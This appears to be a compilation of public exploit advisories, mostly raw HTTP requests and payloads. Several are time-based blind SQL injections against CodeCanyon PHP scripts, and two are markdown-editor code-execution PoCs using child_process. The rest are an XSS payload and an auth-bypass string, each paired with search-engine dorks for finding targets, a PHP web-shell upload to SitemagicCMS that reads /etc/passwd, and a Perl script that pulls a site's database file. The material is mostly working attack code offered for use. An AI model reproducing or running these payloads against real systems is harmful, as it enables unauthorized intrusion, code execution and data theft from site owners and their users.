<pre><code># Exploit Title: Quicklancer v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135<br /># Demo Site: https://quicklancer.bylancer.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /php/user-ajax.php HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />x-requested-with: XMLHttpRequest<br />Referer: https://localhost<br />Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;<br />quickjob_view_counted=31; Quick_lang=arabic<br />Content-Length: 93<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />action=searchStateCountry&dataString=deneme<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: dataString (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068<br />FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo<br /><br /></code></pre>
<pre><code># Exploit Title: Smart School v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018<br /># Demo Site: https://demo.smart-school.in<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /course/filterRecords/ HTTP/1.1<br />Host: localhost<br />Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 136<br />Origin: https://localhost<br />Referer: https://localhost/course/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: searchdata[0][searchfield] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload:<br />searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id<br />AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--<br />hAHp&searchdata[0][searchvalue]=1<br /><br /></code></pre>
<pre><code># Exploit Title: LeadPro CRM v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578<br /># Demo Site: https://demo.leadifly.in<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10<br />HTTP/1.1<br />Host: localhost<br />Cookie:<br />XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;<br />leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V<br />Authorization: Bearer<br />eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8<br />X-Xsrf-Token:<br />eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=<br />Referer: https://localhost/admin/product<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: filters (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload:<br />fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name<br />lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND<br />(8549=8549&order=id desc&offset=0&limit=10<br /><br /></code></pre>
<pre><code># Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution<br /># Date: 2023-04-27<br /># Exploit Author: 8bitsec<br /># CVE: CVE-2023-31874<br /># Vendor Homepage: yank-note.com<br /># Software Link: https://github.com/purocean/yn<br /># Version: 3.52.1<br /># Tested on: [Ubuntu 22.04 | Mac OS 13]<br /><br />Release Date: 2023-04-27<br /><br />Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement<br /><br />Technical Details & Description:<br /><br />A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following payload.<br />Mac:<br /><iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>"><br /><br />Ubuntu:<br /><iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>"><br /><br />Opening the file in Yank Note will auto execute the Calculator application.<br /><br /><br /></code></pre>
<pre><code>===========================================================================================<br />| # Title : Esg 2.5 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://www.creatop.com.tw/esg | <br />| # Dork : Powered by CREATOP |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script><br /><br />[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script><br /><br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|<br />=================================================================================================<br /></code></pre>
<pre><code>========================================================================================<br />| # Title : Apple Zeed ALL YOUR STYLE CMS 1.00 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit) | <br />| # Vendor : https://www.applezeed.com/web-creative-package-all-your-style.php | <br />| # Dork : Power BY applezeed.com | <br />========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : User & Pass : ADMIN' OR 1=1#<br /><br />[+] https://127.0.0.1/https/biggestjoy.com/backend/admin.php?mod=sitemap<br /><br /><br />Greetings to :=============================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*| <br />===========================================================================================<br /></code></pre>
<pre><code># Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution<br /># Date: 2023-04-24<br /># Exploit Author: 8bitsec<br /># CVE: CVE-2023-31873<br /># Vendor Homepage: https://github.com/mariuskueng/gin<br /># Software Link: https://github.com/mariuskueng/gin<br /># Version: 0.7.4<br /># Tested on: [Mac OS 13]<br /><br />Release Date:<br /><br />2023-04-24<br /><br />Product & Service Introduction: Javascript Markdown editor for Mac<br /><br />Technical Details & Description:<br />A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following payload:<br /><video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"><br /><br />Opening the file in Gin will auto execute the Calculator application.<br /><br /></code></pre>
<pre><code># Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/stackposts-social-marketing-tool/21747459<br /># Demo Site: https://demo.stackposts.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /spmo/auth/login HTTP/1.1<br />X-Requested-With: XMLHttpRequest<br />Referer: https://localhost/spmo/<br />Content-Type: application/x-www-form-urlencoded<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Length: 104<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')<br />AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg<br /><br /><br /></code></pre>
<pre><code>#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)<br />#Application: SitemagicCMS<br />#Version: 4.4.3<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://sitemagic.org/Download.html<br />#Software Link: https://github.com/Jemt/SitemagicCMS<br />#Date of found: 14-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. go to content then files <br />2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?><br />3. go to http://localhost/SitemagicCMS/files/images/shell.phar<br /><br /><br /><br />payload: <?php echo system("cat /etc/passwd"); ?><br /><br /><br /><br />Poc request :<br /><br />POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1<br />Host: localhost<br />Content-Length: 492<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf<br />Connection: close<br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system('cat /etc/passwd'); ?><br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMPostBackControl"<br /><br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMRequestToken"<br /><br />60a7a113cf94842a197912273825b421<br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W--<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : A cart 1.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://ToastForums.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># A cart 1.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('A cart 1.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>